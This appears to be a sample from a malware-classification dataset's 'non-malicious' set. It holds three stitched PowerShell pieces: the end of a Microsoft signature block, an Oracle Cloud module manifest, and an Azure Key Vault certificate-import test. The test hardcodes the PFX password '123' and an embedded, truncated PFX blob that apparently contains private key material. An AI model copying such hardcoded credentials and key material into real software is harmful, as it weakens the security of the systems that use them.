# Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy
# MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w
# XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy
# dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG
# A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD
# AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQBSBd3UJ+IsvdMCX+K7xqHa5UBtVC1CaXZv
# HRd+stW0lXA/dTNneCW0TFrBoJY59b9fnbTouPReaku2l3X5bmhsao6DCRVuqcmh
# VPAZySXGeoVfj52cLGiyZLEw6TQzu6D++vjNOGmSibO0KE9Gdv8hQERx5RG0KgrT
# mk8ckeC1VUqueUQHKVCESqTDUDD8dXTLWCmm6HqmQX6/+gKDSXggwpc75hi2AbKS
# o4tulMwTfXJdGdwrsiHjkz8nzIW/Z3PnMgGFU76KuzYFV0XyH9DTS/DPO86RLtQj
# A5ZlVGymTPfTnw7kxoiLJN/yluMHIkHSzpaJvCiqX+Dn1QGREEnNIZeRekvLourq
# PREIOTm1bJRJ065c9YX7bJ0naPixzm5y8Y2B+YIIEAi4jUraOh3oE7a4JvIW3Eg3
# oNqP7qhpd7xMLxq2WnM+U9bqWTeT4VCopAhXu2uGQexdLq7bWdcYwyEFDhS4Z9N0
# uw3h6bjB7S4MX96pfYSEV0MKFGOKbmfCUS7WemkuFqZy0oNHPPx+cfdNYeSF6bhO
# PHdsro1EVd3zWIkdD1G5kEDPnEQtFartM8H+bv5zUhAUJs8qLzuFAdBZQLueD9XZ
# eynjQKwEeAz63xATICh8tOUM2zMgSEhVL8Hm45SB6foes4BTC0Y8SZWov3Iahtvw
# yHFbUqs1YjCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI
# hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
# DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x
# MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy
# MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC
# VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV
# BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
# bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC
# AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg
# M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF
# dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6
# GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp
# Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu
# yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E
# XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0
# lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q
# GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ
# +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA
# PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw
# EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG
# NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV
# MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj
# cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK
# BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC
# AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX
# zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v
# cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI
# KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG
# 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x
# M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC
# VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449
# xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM
# nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS
# PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d
# Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn
# GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs
# QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL
# jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL
# 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNN
# MIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp
# bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw
# b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn
# MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjg2MDMtMDVFMC1EOTQ3MSUwIwYDVQQD
# ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQAx
# W9uizG3hEY89uL2uu+X+mG/rdaCBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w
# IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6WODBDAiGA8yMDI0MDEzMDE0MTUz
# MloYDzIwMjQwMTMxMTQxNTMyWjB0MDoGCisGAQQBhFkKBAExLDAqMAoCBQDpY4ME
# AgEAMAcCAQACAi6RMAcCAQACAhMsMAoCBQDpZNSEAgEAMDYGCisGAQQBhFkKBAIx
# KDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZI
# hvcNAQELBQADggEBADZFJ1QEa2jqoULGnL52fDha1QtxPd9xIQih+STybbWSoso2
# +lM9g7ojTjjpq4XNR1Yx8owMrClUV+mLXnYUe1hIt7/IovC7mOwvbkIUf4IHe/4h
# IPA/gu6ndaRxDMCDhOLAteHeJoz8no/ky2D6Q30Ww9erkmhUqNsXM5cDUa95aOYn
# PVkqsRKY5Wbh0ic1dhyJzDEDpM+MBeOym7XGNEnIUrYrfuTHN0+NbIGGjwAJ+XkJ
# Ko2v+Q7mxuQcKRqSlAqnxnXZYeryl6MJxffgoBCUw+BCkmEEGkuneNGFzmPV0kJu
# zgln3Xws1n8hGkzNXnqdYbZIPb4vY+OR3YUuAywxggQNMIIECQIBATCBkzB8MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNy
# b3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAdebDR5XLoxRjgABAAAB1zAN
# BglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8G
# CSqGSIb3DQEJBDEiBCCG91XR9pv8tJCX/l/dMkIy+pEZWYT+zyyW9hJL4f2CjDCB
# +gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIJzePl5LXn1PiqNjx8YN7TN1ZI0d
# 1ZX/2zRdnI97rJo7MIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh
# c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD
# b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw
# MTACEzMAAAHXmw0eVy6MUY4AAQAAAdcwIgQgKE/P/AnV6rfAAqqmG9sIsf7cs2y9
# 4l1rL/nGKD80LwAwDQYJKoZIhvcNAQELBQAEggIAnhZIR66Xz2raN2oWBNwN9kyO
# hzyWFg6tXPI266QzXKVqPx3cMOFjjJHoDOcGAc1IAcmyJPbETiJdAHyoxpbZluYy
# /zRt1IduYGPhEtAELjtaHfOIH6gR24bLhMSKyMafZEVH2/z8f0reXbEqf2zALAA0
# rKsMx+LD7akRR6ykQyr9ypbBKmd0i+frROR0PB8h7nEccncMNDUypzg8Jded6x7A
# 77qttBp7sOY2VGll1jT8am1PETcSFq9mpKmMzhIfLCL0mCJpZTnqZF5thtA1wYbz
# G+RUl7yTZgr0fsRNYQrnq7Eze9mNO6h2VysMc9nN7+u/fHV3EmR8vtHjtmV74+1t
# hcm6/a46CXdZQRNJ+X3xAnamH1Prkp8i0GEc0v+a6oQ8dflDqmGT5tAadsxBJTun
# IJupWyvfJq8WfuZ7rO8M6JfO7m9Ixxr5vB/wUB41OYDh0V25C3iz9FoBMJ6W7iP6
# EMz16T5FXf5GRzyVqk9mWaOchMWpJPHMVfxNCobF2p4klpHRmVPYNT33HMTcO6Wo
# X5xUC3jHiFyUIu9dPYygleXDMOehlURD9C85V6EI69+q/lQkon3KUhdJbXw43ina
# VmpBfEOPNyLPX8a1+SuceKIayf3w7dCQzDAekz4O3pYreFKiU0rYhgqj6FbKXbke
# Ewacz4t7v+ZC+qdF210=
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_13_37.ps1
|
sample_13_37.ps1
|
#
# Module manifest for module 'OCI.PSModules.Tenantmanagercontrolplane'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Tenantmanagercontrolplane.dll'
# Version number of this module.
ModuleVersion = '80.0.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = '6b57c3ab-69f1-4092-a5c1-380523593dd4'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Tenantmanagercontrolplane Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '80.0.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Tenantmanagercontrolplane.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Add-OCITenantmanagercontrolplaneGovernance',
'Enable-OCITenantmanagercontrolplaneOrder',
'Get-OCITenantmanagercontrolplaneAssignedSubscription',
'Get-OCITenantmanagercontrolplaneAssignedSubscriptionLineItemsList',
'Get-OCITenantmanagercontrolplaneAssignedSubscriptionsList',
'Get-OCITenantmanagercontrolplaneAvailableRegionsList',
'Get-OCITenantmanagercontrolplaneDomain',
'Get-OCITenantmanagercontrolplaneDomainGovernance',
'Get-OCITenantmanagercontrolplaneDomainGovernancesList',
'Get-OCITenantmanagercontrolplaneDomainsList',
'Get-OCITenantmanagercontrolplaneLink',
'Get-OCITenantmanagercontrolplaneLinksList',
'Get-OCITenantmanagercontrolplaneOrder',
'Get-OCITenantmanagercontrolplaneOrganization',
'Get-OCITenantmanagercontrolplaneOrganizationsList',
'Get-OCITenantmanagercontrolplaneOrganizationTenanciesList',
'Get-OCITenantmanagercontrolplaneOrganizationTenancy',
'Get-OCITenantmanagercontrolplaneRecipientInvitation',
'Get-OCITenantmanagercontrolplaneRecipientInvitationsList',
'Get-OCITenantmanagercontrolplaneSenderInvitation',
'Get-OCITenantmanagercontrolplaneSenderInvitationsList',
'Get-OCITenantmanagercontrolplaneSubscription',
'Get-OCITenantmanagercontrolplaneSubscriptionLineItemsList',
'Get-OCITenantmanagercontrolplaneSubscriptionMapping',
'Get-OCITenantmanagercontrolplaneSubscriptionMappingsList',
'Get-OCITenantmanagercontrolplaneSubscriptionsList',
'Get-OCITenantmanagercontrolplaneWorkRequest',
'Get-OCITenantmanagercontrolplaneWorkRequestErrorsList',
'Get-OCITenantmanagercontrolplaneWorkRequestLogsList',
'Get-OCITenantmanagercontrolplaneWorkRequestsList',
'Invoke-OCITenantmanagercontrolplaneApproveOrganizationTenancyForTransfer',
'Invoke-OCITenantmanagercontrolplaneIgnoreRecipientInvitation',
'Invoke-OCITenantmanagercontrolplaneUnapproveOrganizationTenancyForTransfer',
'New-OCITenantmanagercontrolplaneChildTenancy',
'New-OCITenantmanagercontrolplaneDomain',
'New-OCITenantmanagercontrolplaneDomainGovernance',
'New-OCITenantmanagercontrolplaneSenderInvitation',
'New-OCITenantmanagercontrolplaneSubscriptionMapping',
'Receive-OCITenantmanagercontrolplaneRecipientInvitation',
'Remove-OCITenantmanagercontrolplaneDomain',
'Remove-OCITenantmanagercontrolplaneDomainGovernance',
'Remove-OCITenantmanagercontrolplaneGovernance',
'Remove-OCITenantmanagercontrolplaneLink',
'Remove-OCITenantmanagercontrolplaneOrganizationTenancy',
'Remove-OCITenantmanagercontrolplaneSubscriptionMapping',
'Restore-OCITenantmanagercontrolplaneOrganizationTenancy',
'Stop-OCITenantmanagercontrolplaneSenderInvitation',
'Update-OCITenantmanagercontrolplaneDomain',
'Update-OCITenantmanagercontrolplaneDomainGovernance',
'Update-OCITenantmanagercontrolplaneOrganization',
'Update-OCITenantmanagercontrolplaneRecipientInvitation',
'Update-OCITenantmanagercontrolplaneSenderInvitation'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Tenantmanagercontrolplane'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/3745.ps1
|
3745.ps1
|
$pfxPassword = "123"
function Get-CertificateSubjectName([string]$certificateName)
{
return 'CN=' + $certificateName + '.com'
}
function Get-X509FromSecretBySubjectDistinguishedName([string]$keyVault, [string]$secretName, [string]$subjectDistinguishedName)
{
$secret = Get-AzKeyVaultSecret $keyVault $secretName
$secretValueBytes = [System.Convert]::FromBase64String($secret.SecretValueText)
$x509FromSecretCollection = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2Collection
$x509FromSecretCollection.Import($secretValueBytes)
$x509Matches = $x509FromSecretCollection.Find([Security.Cryptography.X509Certificates.X509FindType]::FindBySubjectDistinguishedName, $subjectDistinguishedName, $false)
$matchCount = $x509Matches.Count
Assert-True { $matchCount -le 1 } "There should be at most one cert in the collection with the subject distinguished name '$subjectDistinguishedName'." | Out-Null
if ($matchCount -eq 0)
{
return $null
}
return $x509Matches[0]
}
function CreateAKVCertificate(
[string] $keyVault,
[string] $certificateName)
{
$pfxPath = Get-FilePathFromCommonData 'importpfx01.pfx'
$securePfxPassword = ConvertTo-SecureString $pfxPassword -AsPlainText -Force
$createdCert = Import-AzKeyVaultCertificate $keyVault $certificateName -FilePath $pfxPath -Password $securePfxPassword
$global:createdCertificates += $certificateName
return $createdCert
}
function Test_ImportPfxAsCertificate
{
$keyVault = Get-KeyVault
$certificateName = Get-CertificateName 'importpfxascertificate'
$cert = CreateAKVCertificate $keyVault $certificateName
Assert-NotNull $cert
Assert-NotNull $cert.Name
$x509FromSecret = Get-X509FromSecretBySubjectDistinguishedName $keyVault $cert.Name "CN=KeyVaultTest"
Assert-NotNull $x509FromSecret
Assert-True { $x509FromSecret.HasPrivateKey }
$key = Get-AzKeyVaultKey $keyVault $cert.Name
Assert-NotNull $key
}
function Test_ImportPfxAsCertificateNonSecurePassword
{
$keyVault = Get-KeyVault
$certificateName = Get-CertificateName 'importpfxascertificatenonsecurepassword'
$pfxPath = Get-FilePathFromCommonData 'importpfx01.pfx'
Assert-Throws { $cert = Import-AzKeyVaultCertificate $keyVault $certificateName -FilePath $pfxPath -Password $pfxPassword }
}
function Test_ImportPfxAsCertificateWithoutPassword
{
$keyVault = Get-KeyVault
$certificateName = Get-CertificateName 'importpfxascertificatewithoutpassword'
$pfxPath = Get-FilePathFromCommonData 'importpfx01.pfx'
Assert-Throws { $cert = Import-AzKeyVaultCertificate $keyVault $certificateName -FilePath $pfxPath }
}
function Test_ImportX509Certificate2CollectionAsCertificate
{
$keyVault = Get-KeyVault
$certificateName = Get-CertificateName 'importx509certificate2collectionascertificate'
$pfxBase64 = "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